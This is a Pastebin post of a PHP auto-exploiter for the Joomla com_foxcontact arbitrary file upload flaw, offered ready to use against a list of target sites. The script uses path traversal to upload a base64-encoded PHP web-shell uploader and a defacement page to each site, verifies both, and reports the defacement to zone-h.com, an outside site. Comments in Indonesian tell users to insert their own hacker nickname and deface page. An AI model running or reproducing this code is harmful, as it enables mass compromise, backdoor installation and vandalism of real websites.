daily pastebin goal
83%
SHARE
TWEET

Joomla Component com_foxcontact Arbitrary File Upload (BOT)

AgusSR Dec 11th, 2017 (edited) 1,920 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. /**
  3.  
  4. Joomla Component com_foxcontact Arbitrary File Upload
  5. https://cxsecurity.com/issue/WLB-2016050072
  6.  
  7. Auto Exploiter (Shell Upload, Auto Deface, and Auto Submit Zone -H)
  8. Coded by: L0c4lh34rtz - IndoXploit
  9. http://www.indoxploit.or.id/2017/12/joomla-component-comfoxcontact.html
  10.  
  11. */
  12.  
  13. error_reporting(0);
  14. set_time_limit(0);
  15.  
  16. Class IDX_Foxcontact {
  17.     public  $url;
  18.     private $file = [];
  19.  
  20.     /* Nick Hacker Kalian / Nick Zone -H Kalian */
  21.     /* Pastikan dalam script deface kalian terdapat kata HACKED */
  22.     private $hacker = "L0c4lh34rtz";
  23.  
  24.     /* script uploader, sebaiknya jangan di otak-atik */
  25.     private $uploader  = 'R0lGODlhOw0KPGh0bWw+DQo8dGl0bGU+VXBsb2FkZXIgQnkgSW5kb1hwbG9pdCBCT1Q8L3RpdGxlPg0KPHA+PD9waHAgZWNobyAnPGI+Jy5waHBfdW5hbWUoKS4nPC9iPic7ID8+PGJyPg0KPD9waHAgZWNobyAnPGI+Jy5nZXRjd2QoKS4nPC9iPic7ID8+PC9wPg0KPGZvcm0gbWV0aG9kPSdwb3N0JyBlbmN0eXBlPSdtdWx0aXBhcnQvZm9ybS1kYXRhJz4NCjxpbnB1dCB0eXBlPSdmaWxlJyBuYW1lPSdpZHhfZmlsZSc+DQo8aW5wdXQgdHlwZT0nc3VibWl0JyB2YWx1ZT0ndXBsb2FkJyBuYW1lPSd1cGxvYWQnPg0KPC9mb3JtPg0KPD9waHAgaWYoaXNzZXQoJF9QT1NUWyd1cGxvYWQnXSkpIHsgaWYoQGNvcHkoJF9GSUxFU1snaWR4X2ZpbGUnXVsndG1wX25hbWUnXSwgJF9GSUxFU1snaWR4X2ZpbGUnXVsnbmFtZSddKSkgeyBlY2hvJF9GSUxFU1snaWR4X2ZpbGUnXVsnbmFtZSddLiAnWzxiPk9LPC9iPl0nOyB9IGVsc2UgeyBlY2hvJF9GSUxFU1snaWR4X2ZpbGUnXVsnbmFtZSddLiAnWzxiPkZBSUxFRDwvYj4nOyB9IH0gPz4=';
  26.        
  27.     /* script deface, ubah bagian ini ke base64 script deface kalian */
  28.     private $deface    = 'DQo8IS0tDQphZG1pbkBpbmRveHBsb2l0Lm9yLmlkDQoNCiNQYXRjaCBZb3VyIFN5c3RlbQ0KLS0+DQo8IURPQ1RZUEUgSFRNTD4NCjxodG1sPg0KPGhlYWQ+DQo8dGl0bGU+SGFja2VkIGJ5IEwwYzRsaDM0cnR6fjwvdGl0bGU+DQo8bWV0YSBjaGFyc2V0PSJVVEYtOCI+DQo8bWV0YSBuYW1lPSJhdXRob3IiIGNvbnRlbnQ9IkwwYzRsaDM0cnR6ICNJbmRvWHBsb2l0ICNTYW5qdW5nYW5KaXdhIj4NCjxtZXRhIG5hbWU9ImtleXdvcmRzIiBjb250ZW50PSJJbmRvWHBsb2l0LCBTYW5qdW5nYW4gSml3YSwgSGFja2VkIGJ5IEluZG9YcGxvaXQsIEhhY2tlZCBieSBMMGM0bGgzNHJ0eiI+DQo8bWV0YSBwcm9wZXJ0eT0ib2c6a2V5d29yZHMiIGNvbnRlbnQ9IkluZG9YcGxvaXQsIFNhbmp1bmdhbiBKaXdhLCBIYWNrZWQgYnkgSW5kb1hwbG9pdCwgSGFja2VkIGJ5IEwwYzRsaDM0cnR6Ij4NCjxtZXRhIG5hbWU9ImRlc2NyaXB0aW9uIiBjb250ZW50PSJIYWNrZWQgYnkgTDBjNGxoMzRydHogfCBJbmRvWHBsb2l0IC0gU2FuanVuZ2FuIEppd2EiPg0KPG1ldGEgcHJvcGVydHk9Im9nOmRlc2NyaXB0aW9uIiBjb250ZW50PSJIYWNrZWQgYnkgTDBjNGxoMzRydHogfCBJbmRvWHBsb2l0IC0gU2FuanVuZ2FuIEppd2EiPg0KPGxpbmsgcmVsPSJzaG9ydGN1dCBpY29uIiBocmVmPSJodHRwOi8vZmxhLmZnLWEuY29tL2ZsYWdzL2luZG9uZXNpYS1mbGFnLWJ1dHRvbi0yLnBuZyI+DQo8c3R5bGU+DQpoMSB7DQoJbWFyZ2luLXRvcDogNGVtOw0KCWZvbnQtZmFtaWx5OiBtb25vc3BhY2U7DQoJZm9udC1zaXplOiA0NXB4Ow0KfQ0KDQpib2R5IHsgDQoJYmFja2dyb3VuZDogYmxhY2s7IA0KCXRleHQtYWxpZ246IGNlbnRlcjsgDQoJdGV4dC1zaGFkb3c6IDFweCAxcHggIzE3YTI0ZjsgDQoJZm9udC1mYW1pbHk6Q291cmllciBOZXc7IA0KCWNvbG9yOiB3aGl0ZTsgDQp9IA0KPC9zdHlsZT4NCjwvaGVhZD4NCjxib2R5Pg0KPGgxPkhhY2tlZCBieSBMMGM0bGgzNHJ0ejwvaDE+DQo8cD48Zm9udCBzaXplPSIyIj4jPG1hcnF1ZWUgYmVoYXZpb3I9ImFsdGVybmF0ZSIgc2Nyb2xsYW1vdW50PSI0IiB3aWR0aD0iNDAlIj5JbmRvWHBsb2l0IC0gU2FuanVuZ2FuIEppd2EgLSBEZXBvayBDeWJlciBTZWN1cml0eSA8L21hcnF1ZWU+IzwvZm9udD48L3A+DQo8aWZyYW1lIHNyYz0iaHR0cDovL3d3dy55b3V0dWJlLmNvbS9lbWJlZC9Fem14N21VNnF0Zz9yZWw9MCZhbXA7YXV0b3BsYXk9MSZhbXA7bG9vcD0xJmFtcDtwbGF5bGlzdD1Fem14N21VNnF0ZyIgZnJhbWVib3JkZXI9IjAiIGhlaWdodD0iMSIgd2lkdGg9IjEiPjwvaWZyYW1lPg0KPC9ib2R5Pg0KPC9odG1sPg0KPG5vc2NyaXB0Pg0KPCEtLQ==';
  29.  
  30.          
  31.  
  32.     public function __construct() {
  33.         $this->file = (object) $this->file;
  34.  
  35.         /* Nama file deface kalian */
  36.         $this->file->deface     = "l0c.htm";
  37.  
  38.         $this->file->shell      = $this->randomFileName().".php";
  39.     }
  40.  
  41.     public function validUrl() {
  42.         if(!preg_match("/^http:\/\//", $this->url) AND !preg_match("/^https:\/\//", $this->url)) {
  43.             $url = "http://".$this->url;
  44.             return $url;
  45.         } else {
  46.             return $this->url;
  47.         }
  48.     }
  49.  
  50.     public function randomFileName() {
  51.         $characters = implode("", range(0,9)).implode("", range("A","Z")).implode("", range("a","z"));
  52.         $generate   = substr(str_shuffle($characters), 0, rand(4, 8));
  53.  
  54.         $prefixFilename = "\x69\x6e\x64\x6f\x78\x70\x6c\x6f\x69\x74"."_";
  55.         return $prefixFilename.$generate;
  56.     }
  57.  
  58.     public function curl($url, $data = null, $headers = null, $cookie = true) {
  59.         $ch = curl_init();
  60.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
  61.               curl_setopt($ch, CURLOPT_URL, $url);
  62.               curl_setopt($ch, CURLOPT_USERAGENT, "IndoXploitTools/1.1");
  63.               //curl_setopt($ch, CURLOPT_VERBOSE, TRUE);
  64.               curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
  65.               curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
  66.               curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  67.               curl_setopt($ch, CURLOPT_TIMEOUT, 5);
  68.  
  69.         if($data !== null) {
  70.               curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");
  71.               curl_setopt($ch, CURLOPT_POST, TRUE);
  72.               curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
  73.         }
  74.  
  75.         if($headers !== null) {
  76.               curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
  77.         }
  78.  
  79.         if($cookie === true) {
  80.               curl_setopt($ch, CURLOPT_COOKIE, TRUE);
  81.               curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt");
  82.               curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.txt");
  83.         }
  84.  
  85.         $exec = curl_exec($ch);
  86.         $info = curl_getinfo($ch);
  87.  
  88.               curl_close($ch);
  89.  
  90.         return (object) [
  91.             "response"  => $exec,
  92.             "info"      => $info
  93.         ];
  94.  
  95.     }
  96.  
  97.     public function getId() {
  98.         $url        = $this->url;
  99.         $getContent = $this->curl($url)->response;
  100.         preg_match_all("/<a name=\"cid_(.*?)\">/", $getContent, $cid);
  101.         preg_match_all("/<a name=\"mid_(.*?)\">/", $getContent, $mid);
  102.  
  103.         return (object) [
  104.             "cid" => ($cid[1][0] === NULL ? 0 : $cid[1][0]),
  105.             "mid" => ($mid[1][0] === NULL ? 0 : $mid[1][0]),
  106.         ];
  107.     }
  108.  
  109.     public function exploit() {
  110.         $getCid = $this->getId()->cid;
  111.         $getMid = $this->getId()->mid;
  112.  
  113.         $url    = (object) parse_url($this->url);
  114.  
  115.         $headers = [
  116.             "X-Requested-With: XMLHttpRequest",
  117.             "X-File-Name: ".$this->file->shell,
  118.             "Content-Type: image/jpeg"
  119.         ];
  120.  
  121.         $vuln   = [
  122.             $url->scheme."://".$url->host."/components/com_foxcontact/lib/file-uploader.php?cid=".$getCid."&mid=".$getMid."&qqfile=/../../".$this->file->shell,
  123.             $url->scheme."://".$url->host."/index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id=".$getCid."?cid=".$getCid."&mid=".$getMid."&qqfile=/../../".$this->file->shell,
  124.             $url->scheme."://".$url->host."/index.php?option=com_foxcontact&view=loader&type=uploader&owner=module&id=".$getCid."?cid=".$getCid."&mid=".$getMid."&qqfile=/../../".$this->file->shell,
  125.             $url->scheme."://".$url->host."/components/com_foxcontact/lib/uploader.php?cid=".$getCid."&mid=".$getMid."&qqfile=/../../".$this->file->shell,
  126.         ];
  127.  
  128.         foreach($vuln as $v) {
  129.             $this->curl($v, base64_decode($this->uploader), $headers);
  130.         }
  131.  
  132.         $shell = $url->scheme."://".$url->host."/components/com_foxcontact/".$this->file->shell;
  133.         $check = $this->curl($shell)->response;
  134.         if(preg_match("/Uploader By IndoXploit BOT/i", $check)) {
  135.             print "[+] Shell OK: ".$shell."\n";
  136.             $this->save($shell);
  137.         } else {
  138.             print "[-] Shell Failed\n";
  139.         }
  140.        
  141.         $vuln   = [
  142.             $url->scheme."://".$url->host."/components/com_foxcontact/lib/file-uploader.php?cid=".$getCid."&mid=".$getMid."&qqfile=/../../../../".$this->file->deface,
  143.             $url->scheme."://".$url->host."/index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id=".$getCid."?cid=".$getCid."&mid=".$getMid."&qqfile=/../../../../".$this->file->deface,
  144.             $url->scheme."://".$url->host."/index.php?option=com_foxcontact&view=loader&type=uploader&owner=module&id=".$getCid."?cid=".$getCid."&mid=".$getMid."&qqfile=/../../../../".$this->file->deface,
  145.             $url->scheme."://".$url->host."/components/com_foxcontact/lib/uploader.php?cid=".$getCid."&mid=".$getMid."&qqfile=/../../../../".$this->file->deface,
  146.         ];
  147.  
  148.         foreach($vuln as $v) {
  149.             $this->curl($v, base64_decode($this->deface), $headers);
  150.         }
  151.  
  152.         $deface = $url->scheme."://".$url->host."/".$this->file->deface;
  153.         $check = $this->curl($deface)->response;
  154.         if(preg_match("/hacked/i", $check)) {
  155.             print "[+] Deface OK: ".$deface."\n";
  156.             $this->zoneh($deface);
  157.             $this->save($deface);
  158.         } else {
  159.             print "[-] Deface Failed\n";
  160.         }
  161.     }
  162.  
  163.     public function zoneh($url) {
  164.         $post = $this->curl("http://www.zone-h.com/notify/single", "defacer=".$this->hacker."&domain1=$url&hackmode=1&reason=1&submit=Send",null,false);
  165.         if(preg_match("/color=\"red\">(.*?)<\/font><\/li>/i", $post->response, $matches)) {
  166.             if($matches[1] === "ERROR") {
  167.                 preg_match("/<font color=\"red\">ERROR:<br\/>(.*?)<br\/>/i", $post->response, $matches2);
  168.                 print "[-] Zone-H ($url) [ERROR: ".$matches2[1]."]\n\n";
  169.             } else {
  170.                 print "[+] Zone-H ($url) [OK]\n\n";
  171.             }
  172.         }
  173.     }
  174.  
  175.     public function save($isi) {
  176.         $handle = fopen("result_foxcontact.txt", "a+");
  177.         fwrite($handle, "$isi\n");
  178.         fclose($handle);
  179.     }
  180. }  
  181.  
  182. if(!isset($argv[1])) die("!! Usage: php ".$argv[0]." target.txt");
  183. if(!file_exists($argv[1])) die("!! File target ".$argv[1]." tidak di temukan!!");
  184. $open = explode("\n", file_get_contents($argv[1]));
  185.  
  186. foreach($open as $list) {
  187.     $fox = new IDX_Foxcontact();
  188.     $fox->url = trim($list);
  189.     $fox->url = $fox->validUrl();
  190.  
  191.     print "[*] Exploiting ".parse_url($fox->url, PHP_URL_HOST)."\n";
  192.     $fox->exploit();
  193. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top